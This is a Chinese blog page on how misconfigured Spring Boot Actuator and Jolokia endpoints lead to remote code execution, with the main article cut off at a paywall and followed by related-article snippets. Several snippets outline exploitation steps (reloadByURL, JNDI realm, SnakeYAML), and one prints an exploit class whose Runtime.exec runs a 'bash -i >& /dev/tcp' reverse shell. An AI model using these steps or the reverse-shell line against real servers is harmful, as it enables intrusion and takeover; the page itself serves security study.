【网络安全 | Java代码审计】Actuators导致RCE

已于 2024-11-21 21:09:17 修改
阅读量3.4k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全新手快速入门(附漏洞挖掘案例) 文章标签: web安全 java 代码审计
于 2024-11-20 22:13:55 首次发布
原创文章,禁止转载,否则保留追究法律责任的权利。
本文链接:https://blog.youkuaiyun.com/2301_77485708/article/details/143926661

文章目录

相关链接:【网络安全 | Java代码审计】利用 Spring Boot Actuators 漏洞

前言

Spring Boot Actuators 是一组用于监控和管理 Spring Boot 应用程序的工具,但在配置不当时,可能成为远程代码执行(RCE)的触发点。

常见的 RCE 情形有:Actuators + JolokiaActuators + Spring Cloud

Actuators + jolokia

Jolokia 是一种基于 JMX(Java Management Extensions)的代理工具,它为 JMX 提供了 RESTful 的接口,便于管理和监控。但当 Jolokia 与 Spring Boot Actuators 配合使用时,如果存在不安全的配置,攻击者可通过漏洞实现远程代码执行。

场景一:存在logback.xml

成因:

  • Spring Boot 默认的日志配置文件为 logback.xmllogback-spring.xml,但开发者可以通过 appl
了解本专栏 订阅专栏 解锁全文 超级会员免费看
Springboot之actuator配置不当漏洞RCE(jolokia)
墨痕诉清风的博客
10-25 5205
日穿扫描扫到一个spring boot actuator 可以看到有jolokia这个端点,再看下jolokia/list,存在type=MBeanFactory 关键字 可以使用jolokia-realm-jndi-rce具体步骤如下 先用python3开一个web服务 python3 -m http.server 8080 编译java利用代码 /** * javac -source 1.5 -target 1.5 JNDIObject.java * * Buil..
网络安全 | Java代码审计】利用 Spring Boot Actuators 漏洞
等风来
11-20 3606
Spring Boot 框架内置了多个用于监控和管理应用程序的Actuator功能。这些功能可以帮助开发者执行审计、健康检查以及收集系统指标。然而,如果配置不当,Actuators 端点可能成为攻击者利用的“后门”,从而暴露敏感信息或使应用程序处于攻击者控制之下。
SpringBoot Actuator RCE 漏洞总结
渗透测试研究中心
03-01 3778
一、SpringBoot env 获取* 敏感信息当我们直接访问 springboot 站点时,可以看到某些 password 字段填充了*通过${name} 可以获取明文字段 2. 配置不当导致敏感信息泄露(password 打星号,而 pwd 没有打星号)参考https://mp.weixin.qq.com/s/HmGEYRcf1hSVw9Uu9XHGsA具体实现过程:例如: 我...
Spring Boot jolokia 配置不当导致RCE漏洞
Bird&Bird
03-16 7323
访问 /jolokia/list 接口,查看是否存在 ch.qos.logback.classic.jmx.JMXConfigurator 和 reloadByURL 关键词。根据实际情况修改 springboot-realm-jndi-rce.py 脚本中的目标地址,RMI 地址、端口等信息,然后在自己控制的服务器上运行。普通 JNDI 注入受目标 JDK 版本影响,jdk < 6u201/7u191/8u182/11.0.1(LDAP),但相关环境可绕过。环境运行起来后,访问一下/jolokia接口。
高版本JDK下的Jolokia Realm JNDI RCE小记
weixin_40418457的博客
05-05 4014
0x01 引言 在一个阳光明媚的下午,接到一个渗透测试项目。经过一波资产收集,发现一处jolokia,存在 type=MBeanFactory 和 createJNDIRealm。 https://api.example.com//actuator/jolokia/list 你没看错,这个资源必须//才能访问到。 0x02 一波三折的RCE 1. 本着面向github渗透,利用公开的poc打了一波。 引用:https://github.com/LandGrey/SpringBootVulExploit#
Spring actuator Jolokia XXE RCE实现(持续更新)
qq_36737214的博客
12-02 1301
背景:今天想实践一下actuator Jolokia XXE RCE的复现;复现过程中出现了很多的名词之前是没接触到的,就一此次复现做一个契机,补充一下自己需要知道的知识点 文章目录搭建HTTP服务器。供JMXConfigurator中提供的“reloadByURL”方法,引入外部xml文件。解析外部引入的xml,对插入JNDI部分解析并进行创建JNDI服务 需要了解的知识点如下:其中的每一点我基本上都会先一篇文章去整理。 思维导图地址地址:https://www.processon.com/mindm
网络安全 | Java代码审计java-sec-code
等风来
11-07 3570
项目地址:https://github.com/JoyChou93/java-sec-code项目说明:Java 漏洞靶场,可黑盒测试及审计代码。README:https://github.com/JoyChou93/java-sec-code/blob/master/README_zh.md靶场默认环境为Linux。如果在Windows上搭建并验证漏洞,则需要对部分代码进行调整。在运行项目之前,需确保MySQL服务已启动。本文使用PHP Study来启动该服务。由于PHP Study不允许创建用户名为ro
jolokia Realm JNDI RCE分析
12-09 2919
jolokia Realm JNDI RCE分析
Spring-boot Actuator H2 RCE复现
1
09-07 2224
Spring Boot Actuator H2 RCE复现
Jolokia RCE漏洞利用
baidu_38844729的博客
11-30 3350
利用步骤 1、编译java利用代码,将其命名为Exploit.java,然后编译生成class文件:javac Exploit.java public class Exploit { public ExportObject() { try { System.setSecurityManager(null); java.lang.Runtime.getRuntime().exec("sh -c $@|sh . echo `bash -i >& /dev/tcp
jolokia logback JNDI RCE
12-08 1664
jolokia logback JNDI RCE漏洞分析
Spring actuator Jolokia XXE RCE
qq_35533398的博客
10-07 1955
Jolokia XXE/RCE Jolokia允许通过HTTP访问所有已注册的MBean,同时可以使用URL列出所有可用的MBeans操作,访问http://127.0.0.1:8090/jolokia/list即可列出,如下为返回: 格式化后logback Mbean: jolokia在logback JMXConfigurator中提供的“reloadByURL”方法允许从外部URL重新加载日志的记录配置 官网给出了GET和POST两种方式的访问路径以及参数: ..
jdk8u121以上 jolokia Realm JNDI RCE解决
为之的博客
12-02 1598
我的版本为java1.8.0_152,比121高,但我想对其进行debug,又不想重装jdk或者虚拟机远程debug,就找了半天怎么解决,然后百度都是告诉你 com.sun.jndi.rmi.object.trustURLCodebase设置为true就好了,就始终没人教教我这个菜鸡怎么设置。 Environment要点一下扩展开,在里面输入命令点击OK就解决了,哎,太菜了。 -Dcom.sun.jndi.rmi.object.trustURLCodebase=true ...
Actuators + jolokia
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-07 885
首先我们查看我们当前环境http://x.x.x.x/jolokia/list地址,是否存在reloadByURL这个方法, 这个方法是造成RCE的关键。因为logback组件提供的reloadByURL操作使我们可以从外部URL重新加载日志配置创建logback.xml和file.dtd文件logback.xml文件file.dtd文件远程访问造成logback.xml文件, 造成XXE漏洞。
Java中的Actuator
最新发布
2302_79932868的博客
02-15 706
端点暴露:借助Spring的MVC或WebFlux框架,将Actuator的各个端点以HTTP接口的形式暴露出来,以便外部工具或用户通过HTTP请求访问这些端点获取信息或执行操作。- 依赖注入与自动配置:基于Spring的依赖注入机制,通过自动配置功能,在应用启动时自动配置和初始化Actuator相关的Bean,加载相关配置和组件。- 数据收集与处理:利用Java的管理接口(如JMX)、各种监控工具和框架,收集应用运行时的各种数据,并进行处理和格式化,以合适的方式返回给用户。
spring boot actuator RCE
问题很多的小明
06-27 2644
搭建漏洞环境: git clone https://github.com/veracode-research/actuator-testbed mvn install 或者 mvn spring-boot:run,如果遇到了报错,多半是因为网络问题导致本地mvn仓库下载不完全导致项目依赖解析出问题,解决办法点这里 本地访问一下: 关于路径问题:1.x版本的在根路径下注册路由,2.x版本则需要加/actuator/ 路径 描述 /autoconfig 提供了一
春眠不觉晓,RCE知多少?
Summer's blog
05-13 5903
一篇文章带你入门Java代码审计RCE 简单分析Spring Boot Actuators to RCE复现和 CVE-2020-8840 FasterXML/jackson-databind 远程代码执行漏洞复现带你入门Java代码审计
Spring Boot Actuator RCE
weixin_30693683的博客
03-16 865
来看一下IDEA如何调试Spring Boot 先在https://github.com/artsploit/actuator-testbed下载源码 如下命令就能通过maven环境启动 mvn install mvn spring-boot:run 需要但开启调试模式,在pom.xml文件加入如下配置: <configuration> ...
Spring-boot远程代码执行系列(spring cloud SnakeYAML RCE
网络安全。
06-18 9400
0x01 漏洞原理 spring.cloud.bootstrap.location 属性被设置为外部恶意 yml 文件 URL 地址 refresh 触发目标机器请求远程 HTTP 服务器上的 yml 文件,获得其内容 SnakeYAML 由于存在反序列化漏洞,所以解析恶意 yml 内容时会完成指定的动作 先是触发 java.net.URL 去拉取远程 HTTP 服务器上的恶意 jar 文件 然后是寻找 jar 文件中实现 javax.script.ScriptEngineFactory 接口的类并实例化
PITCH ACTUATORS代码对比分析
文件标题为"Compare_Pitch_Actuators.rar_Compare",表明此文件可能是对不同节距执行器(pitch actuators)进行比较分析的源代码压缩包。压缩包中包含了一个名为"Compare_Pitch_Actuators.m"的MATLAB脚本文件。节距...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

秋说

感谢打赏

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值